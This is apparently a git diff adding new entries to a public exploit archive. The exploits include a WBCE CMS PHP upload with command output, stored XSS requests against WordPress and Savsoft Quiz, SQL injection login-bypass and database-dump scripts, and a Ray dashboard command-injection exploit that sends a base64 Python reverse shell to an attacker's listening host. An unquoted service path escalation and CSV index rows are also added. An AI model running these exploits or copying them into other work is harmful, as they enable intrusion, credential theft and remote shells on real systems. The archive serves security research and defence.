demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23 +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php +Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459 +Content-Length: 522 +Origin: https://demos6.softaculous.com +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +-----------------------------86020911415982314764024459 +Content-Disposition: form-data; name="formtoken" + +5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c +-----------------------------86020911415982314764024459 +Content-Disposition: form-data; name="userfile"; filename="upgrade.php" +Content-Type: application/x-php + + + +-----------------------------86020911415982314764024459 +Content-Disposition: form-data; name="submit" + + +-----------------------------86020911415982314764024459-- + +### Response : + + + + +
+
+ + +
+uid=1000(soft) gid=1000(soft) groups=1000(soft) +uid=1000(soft) gid=1000(soft) groups=1000(soft) +
+ + +

Invalid WBCE CMS language file. Please check the text file.

+ +

Back \ No newline at end of file diff --git a/exploits/php/webapps/51987.txt b/exploits/php/webapps/51987.txt new file mode 100644 index 0000000000..1b30dac93d --- /dev/null +++ b/exploits/php/webapps/51987.txt @@ -0,0 +1,36 @@ +# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) +# Date: 12 April 2024 +# Exploit Author: Erdemstar +# Vendor: https://wordpress.com/ +# Version: 1.1.1 + +# Proof Of Concept: +1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]". + +# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w +# Vulnerable Property at Request: videoFields[post_type] +# Payload: +# Request: +POST /wp-admin/options.php HTTP/2 +Host: erdemstar.local +Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9 +Content-Length: 395 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "macOS" +Upgrade-Insecure-Requests: 1 +Origin: https://erdemstar.local +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Priority: u=0, i + +option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes \ No newline at end of file diff --git a/exploits/php/webapps/51988.txt b/exploits/php/webapps/51988.txt new file mode 100644 index 0000000000..77a7de0963 --- /dev/null +++ b/exploits/php/webapps/51988.txt @@ -0,0 +1,48 @@ +# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site +Scripting +# Date: 2024-01-03 +# Exploit Author: Eren Sen +# Vendor: SAVSOFT QUIZ +# Vendor Homepage: https://savsoftquiz.com +# Software Link: https://savsoftquiz.com/web/index.php/online-demo/ +# Version: < 6.0 +# CVE-ID: N/A +# Tested on: Kali Linux / Windows 10 +# Vulnerabilities Discovered Date : 2024/01/03 + +# Persistent Cross Site Scripting (XSS) Vulnerability +# Vulnerable Parameter Type: POST +# Vulnerable Parameter: quiz_name + +# Proof of Concepts: + +https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13 + +# HTTP Request: + +POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1 +Host: demos1.softaculous.com +Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx +Content-Length: 411 +Cache-Control: max-age=0 +Sec-Ch-Ua: +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "" +Upgrade-Insecure-Requests: 1 +Origin: https://demos1.softaculous.com +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: +https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text= \ No newline at end of file diff --git a/exploits/php/webapps/51989.txt b/exploits/php/webapps/51989.txt new file mode 100644 index 0000000000..955cb37def --- /dev/null +++ b/exploits/php/webapps/51989.txt @@ -0,0 +1,131 @@ +# Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass +# Date: 02/10/2024 +# Exploit Author: Diyar Saadi +# Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip +# Version: V 1.2 +# Tested on: Windows 11 + XAMPP 8.0.30 + +## Exploit Description ## + +SQL Injection Vulnerability in ofrs/admin/index.php : +The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process. + +## Steps to reproduce ## + +1- Open the admin panel page by following URL : http://localhost/ofrs/admin/index.php +2- Enter the following payload from username-box : admin'or'1-- +3- Press Login button or press Enter . + +## Proof Of Concept [1] ## + +POST /ofrs/admin/index.php HTTP/1.1 +Host: localhost +Content-Length: 46 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/ofrs/admin/index.php +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=fmnj70mh1qo2ssv80mlsv50o29 +Connection: close + +username=admin%27or%27--&inputpwd=&login=login + +## Proof Of Concept [ Python Based Script ] [2] ## + +import os +import requests +from selenium import webdriver +from selenium.webdriver.common.by import By +from selenium.webdriver.support.ui import WebDriverWait +from selenium.webdriver.support import expected_conditions as EC +import pyautogui + + +banner = """ + + + + + + + + +░█████╗░███████╗██████╗░░██████╗  ░█████╗░███╗░░░███╗░██████╗ +██╔══██╗██╔════╝██╔══██╗██╔════╝  ██╔══██╗████╗░████║██╔════╝ +██║░░██║█████╗░░██████╔╝╚█████╗░  ██║░░╚═╝██╔████╔██║╚█████╗░ +██║░░██║██╔══╝░░██╔══██╗░╚═══██╗  ██║░░██╗██║╚██╔╝██║░╚═══██╗ +╚█████╔╝██║░░░░░██║░░██║██████╔╝  ╚█████╔╝██║░╚═╝░██║██████╔╝ +░╚════╝░╚═╝░░░░░╚═╝░░╚═╝╚═════╝░  ░╚════╝░╚═╝░░░░░╚═╝╚═════╝░ +# Code By : Diyar Saadi + + + + + + + + """ + +print(banner) + +payload_requests = input("Enter the payload: ") + +url_requests = "http://localhost/ofrs/admin/index.php" +data = { + 'username': payload_requests, + 'password': 'password', + 'login': 'Login' +} +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Custom-Header': 'Your-Custom-Value' +} + +try: + response = requests.post(url_requests, data=data, headers=headers, allow_redirects=False) + + if response.status_code == 302 and response.headers.get('Location') and 'dashboard.php' in response.headers['Location']: + print("Requests version: Admin Panel Successfully Bypassed !") + + url_selenium = "http://localhost/ofrs/admin/index.php" + + chrome_driver_path = "C:\\Windows\\webdriver\\chromedriver.exe" + + chrome_options = webdriver.ChromeOptions() + chrome_options.add_argument("executable_path=" + chrome_driver_path) + + driver = webdriver.Chrome(options=chrome_options) + driver.get(url_selenium) + + pyautogui.typewrite(payload_requests) + pyautogui.press('tab') + pyautogui.typewrite(payload_requests) + + pyautogui.press('enter') + + WebDriverWait(driver, 10).until(EC.url_contains("dashboard.php")) + + screenshot_path = os.path.join(os.getcwd(), "dashboard_screenshot.png") + driver.save_screenshot(screenshot_path) + print(f"Selenium version: Screenshot saved as {screenshot_path}") + + driver.quit() + + else: + print("Requests version: Login failed.") +except Exception as e: + print(f"An error occurred: {e}") \ No newline at end of file diff --git a/exploits/php/webapps/51990.py b/exploits/php/webapps/51990.py new file mode 100755 index 0000000000..a22b8eee52 --- /dev/null +++ b/exploits/php/webapps/51990.py @@ -0,0 +1,55 @@ +# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection +# Date: February 6, 2024 +# Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group +# Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip +# Tested on: Linux and Windows, XAMPP +# CVE-2023-51951 +# Vendor: oretnom23 +# Version: v1.0 +# Exploit Description: +# The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the SQL database using an Error-Based Injection attack. + +import requests +from bs4 import BeautifulSoup +import argparse + +def print_header(): + print("\033[1m\nStock Management System v1.0\033[0m") + print("\033[1mSQL Injection Exploit\033[0m") + print("\033[96mby blu3ming\n\033[0m") + +def parse_response(target_url): + try: + target_response = requests.get(target_url) + soup = BeautifulSoup(target_response.text, 'html.parser') + textarea_text = soup.find('textarea', {'name': 'remarks', 'id': 'remarks'}).text + + # Split the text using ',' as a delimiter + users = textarea_text.split(',') + for user in users: + # Split username and password using ':' as a delimiter + username, password = user.split(':') + print("| {:<20} | {:<40} |".format(username, password)) + except: + print("No data could be retrieved. Try again.") + +def retrieve_data(base_url): + target_path = '/sms/admin/?page=purchase_order/manage_po&id=' + payload = "'+union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,password),10,11,12,13+from+users--+-" + + #Dump users table + target_url = base_url + target_path + payload + print("+----------------------+------------------------------------------+") + print("| {:<20} | {:<40} |".format("username", "password")) + print("+----------------------+------------------------------------------+") + parse_response(target_url) + print("+----------------------+------------------------------------------+\n") + +if __name__ == "__main__": + about = 'Unauthenticated SQL Injection Exploit - Stock Management System' + parser = argparse.ArgumentParser(description=about) + parser.add_argument('--url', dest='base_url', required=True, help='Stock Management System URL') + args = parser.parse_args() + print_header() + retrieve_data(args.base_url) \ No newline at end of file diff --git a/exploits/python/webapps/51978.txt b/exploits/python/webapps/51978.txt new file mode 100644 index 0000000000..f4bf4ac375 --- /dev/null +++ b/exploits/python/webapps/51978.txt @@ -0,0 +1,96 @@ +# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized) +# Description: +# The Ray Project dashboard contains a CPU profiling page, and the format parameter is +# not validated before being inserted into a system command executed in a shell, allowing +# for arbitrary command execution. If the system is configured to allow passwordless sudo +# (a setup some Ray configurations require) this will result in a root shell being returned +# to the user. If not configured, a user level shell will be returned +# Version: <= 2.6.3 +# Date: 2024-4-10 +# Exploit Author: Fire_Wolf +# Tested on: Ubuntu 20.04.6 LTS +# Vendor Homepage: https://www.ray.io/ +# Software Link: https://github.com/ray-project/ray +# CVE: CVE-2023-6019 +# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe +# ========================================================================================== + +# !usr/bin/python3 +# coding=utf-8 +import base64 +import argparse +import requests +import urllib3 + +proxies = {"http": "127.0.0.1:8080"} +headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" +} + + +def check_url(target, port): + target_url = target + ":" + port + https = 0 + if 'http' not in target: + try: + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + test_url = 'http://' + target_url + response = requests.get(url=test_url, headers=headers, verify=False, timeout=3) + if response.status_code != 200: + is_https = 0 + return is_https + except Exception as e: + print("ERROR! The Exception is:" + format(e)) + if https == 1: + return "https://" + target_url + else: + return "http://" + target_url + + +def exp(target,ip,lhost, lport): + payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\'' + print("[*]Payload is: " + payload) + b64_payload = base64.b64encode(payload.encode()) + print("[*]Base64 encoding payload is: " + b64_payload.decode()) + exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`' + # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess) + print(exp_url) + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + response = requests.get(url=exp_url, headers=headers, verify=False) + if response.status_code == 200: + print("[-]ERROR: Exploit Failed,please check the payload.") + else: + print("[+]Exploit is finished,please check your machine!") + + +if __name__ == '__main__': + parser = argparse.ArgumentParser( + description=''' + ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ + ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ + ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄ + ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃ + + + + ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄ + ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄ + ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀ + ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄ + ''', + formatter_class=argparse.RawDescriptionHelpFormatter, + ) + parser.add_argument('-t', '--target', type=str, required=True, help='tart ip') + parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port') + parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip') + parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port') + args = parser.parse_args() + # target = args.target + ip = args.target + # port = args.port + # lhost = args.lhost + # lport = args.lport + targeturl = check_url(args.target, args.port) + print(targeturl) + print("[*] Checking in url: " + targeturl) + exp(targeturl, ip, args.lhost, args.lport) \ No newline at end of file diff --git a/exploits/windows_x86-64/local/51977.txt b/exploits/windows_x86-64/local/51977.txt new file mode 100644 index 0000000000..fe8c6854cc --- /dev/null +++ b/exploits/windows_x86-64/local/51977.txt @@ -0,0 +1,36 @@ +# Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path +# Google Dork: null +# Date: 4/10/2024 +# Exploit Author: Joseph Kwabena Fiagbor +# Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/ +# Software Link: +# Version: v.1.23.0.02 +# Tested on: windows 7-11 +# CVE : CVE-2024-31804 + +1. Description: + +The Terratec dmx_6fire usb installs as a service with an unquoted service +path running +with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +2. Proof + +> C:\Users\Astra>sc qc "ttdmx6firesvc" +> {SC] QueryServiceConfig SUCCESS +> +> SERVICE_NAME: ttdmx6firesvc +> TYPE : 10 WIN32_OWN_PROCESS +> START_TYPE : 2 AUTO_START +> ERROR_CONTROL : 1 NORMAL +> BINARY_PATH_NAME : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service +> LOAD_ORDER_GROUP : PlugPlay +> TAG : 0 +> DISPLAY_NAME : DMX6Fire Control +> DEPENDENCIES : eventlog +> : PlugPlay +> SERVICE_START_NAME : LocalSystem +> +> \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index efe915c56c..6167814a60 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,,2018-02-28,2018-02-28,0,CVE-2016-1887,,,,,https://cturt.github.io/sendmsg.html 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb +51976,exploits/go/remote/51976.txt,"MinIO < 2024-01-31T20-20-33Z - Privilege Escalation",2024-04-12,"Jenson Zhao",remote,go,,2024-04-12,2024-04-12,0,CVE-2024-24747,,,,, 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,, 51961,exploits/go/webapps/51961.txt,"Casdoor < v1.331.0 - '/api/set-password' CSRF",2024-04-02,"Van Lam Nguyen",webapps,go,,2024-04-02,2024-04-02,0,CVE-2023-34927,,,,, 51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,, @@ -5747,6 +5748,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 25739,exploits/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp,,2005-05-27,2013-05-27,1,,,,,,https://www.securityfocus.com/bid/13794/info 25738,exploits/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",webapps,jsp,,2005-05-27,2013-05-27,1,,,,,,https://www.securityfocus.com/bid/13793/info 26778,exploits/jsp/webapps/26778.txt,"BlackBoard Academic Suite 6.2.3.23 - Frameset.jsp Cross-Domain Frameset Loading",2005-12-12,dr_insane,webapps,jsp,,2005-12-12,2013-07-12,1,CVE-2005-4206;OSVDB-21618,,,,,https://www.securityfocus.com/bid/15814/info +51991,exploits/jsp/webapps/51991.py,"BMC Compuware iStrobe Web - 20.13 - Pre-auth RCE",2024-04-13,trancap,webapps,jsp,,2024-04-13,2024-04-13,0,,,,,, 35707,exploits/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure",2011-05-05,"Richard Brain",webapps,jsp,,2011-05-05,2015-01-06,1,,,,,,https://www.securityfocus.com/bid/47731/info 35706,exploits/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",webapps,jsp,,2011-05-05,2015-01-06,1,,,,,,https://www.securityfocus.com/bid/47728/info 37260,exploits/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",webapps,jsp,8080,2015-06-10,2016-10-10,1,CVE-2015-3898;CVE-2015-3897;OSVDB-122082;OSVDB-122081,,,,,https://www.htbridge.com/advisory/HTB23259 @@ -10510,6 +10512,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21117,exploits/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflows",2001-10-05,kf,local,multiple,,2001-10-05,2012-09-23,1,CVE-2001-1127;OSVDB-11900,,,,,https://www.securityfocus.com/bid/3404/info 21359,exploits/multiple/local/21359.c,"Progress Database 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,local,multiple,,2002-03-22,2016-10-27,1,CVE-2001-1127;OSVDB-11904,,,,,https://www.securityfocus.com/bid/4402/info 288,exploits/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Local Privilege Escalation",2001-03-04,"the itch",local,multiple,,2001-03-03,,1,,,,,, +51983,exploits/multiple/local/51983.txt,"PrusaSlicer 2.6.1 - Arbitrary code execution",2024-04-12,"Kamil Breński",local,multiple,,2024-04-12,2024-04-12,0,,,,,, 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,,2018-01-11,2018-01-11,0,CVE-2016-0772,,,,,https://github.com/tintinweb/pub/tree/11f6ebda59ad878377df78351f8ab580660d0024/pocs/cve-2016-0772 21078,exploits/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 - Weak Password Encryption",2001-08-23,"Desmond Irvine",local,multiple,,2001-08-23,2012-09-05,1,CVE-2001-1003;OSVDB-11802,,,,,https://www.securityfocus.com/bid/3228/info 47172,exploits/multiple/local/47172.sh,"S-nail < 14.8.16 - Local Privilege Escalation",2019-01-13,bcoles,local,multiple,,2019-07-26,2019-07-26,0,CVE-2017-5899,,,,,https://github.com/bcoles/local-exploits/blob/3c5cd80a7c59ccd29a2c2a1cdbf71e0de8e66c11/CVE-2017-5899/exploit.sh @@ -19479,6 +19482,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45837,exploits/php/webapps/45837.txt,"Gumbo CMS 0.99 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80,2018-11-13,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgumbo-0.99beta.zip, 48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,,2020-03-03,2020-03-03,0,,,,,, 48106,exploits/php/webapps/48106.txt,"GUnet OpenEclass E-learning platform 1.7.3 - 'uname' SQL Injection",2020-02-24,emaragkos,webapps,php,,2020-02-24,2020-02-26,0,,,,,http://www.exploit-db.comeclass-1.7.3.zip, +51975,exploits/php/webapps/51975.txt,"GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload",2024-04-12,"George Tsimpidas",webapps,php,,2024-04-12,2024-04-12,0,CVE-2024-31777,,,,, 23219,exploits/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,webapps,php,,2003-10-05,2012-12-08,1,OSVDB-2625,,,,,https://www.securityfocus.com/bid/8768/info 23192,exploits/php/webapps/23192.txt,"GuppY 2.4 - HTML Injection",2003-09-29,"David Suzanne",webapps,php,,2003-09-29,2012-12-06,1,,,,,,https://www.securityfocus.com/bid/8717/info 23220,exploits/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,webapps,php,,2003-10-05,2012-12-08,1,OSVDB-3198,,,,,https://www.securityfocus.com/bid/8769/info @@ -19767,6 +19771,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 27237,exploits/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr 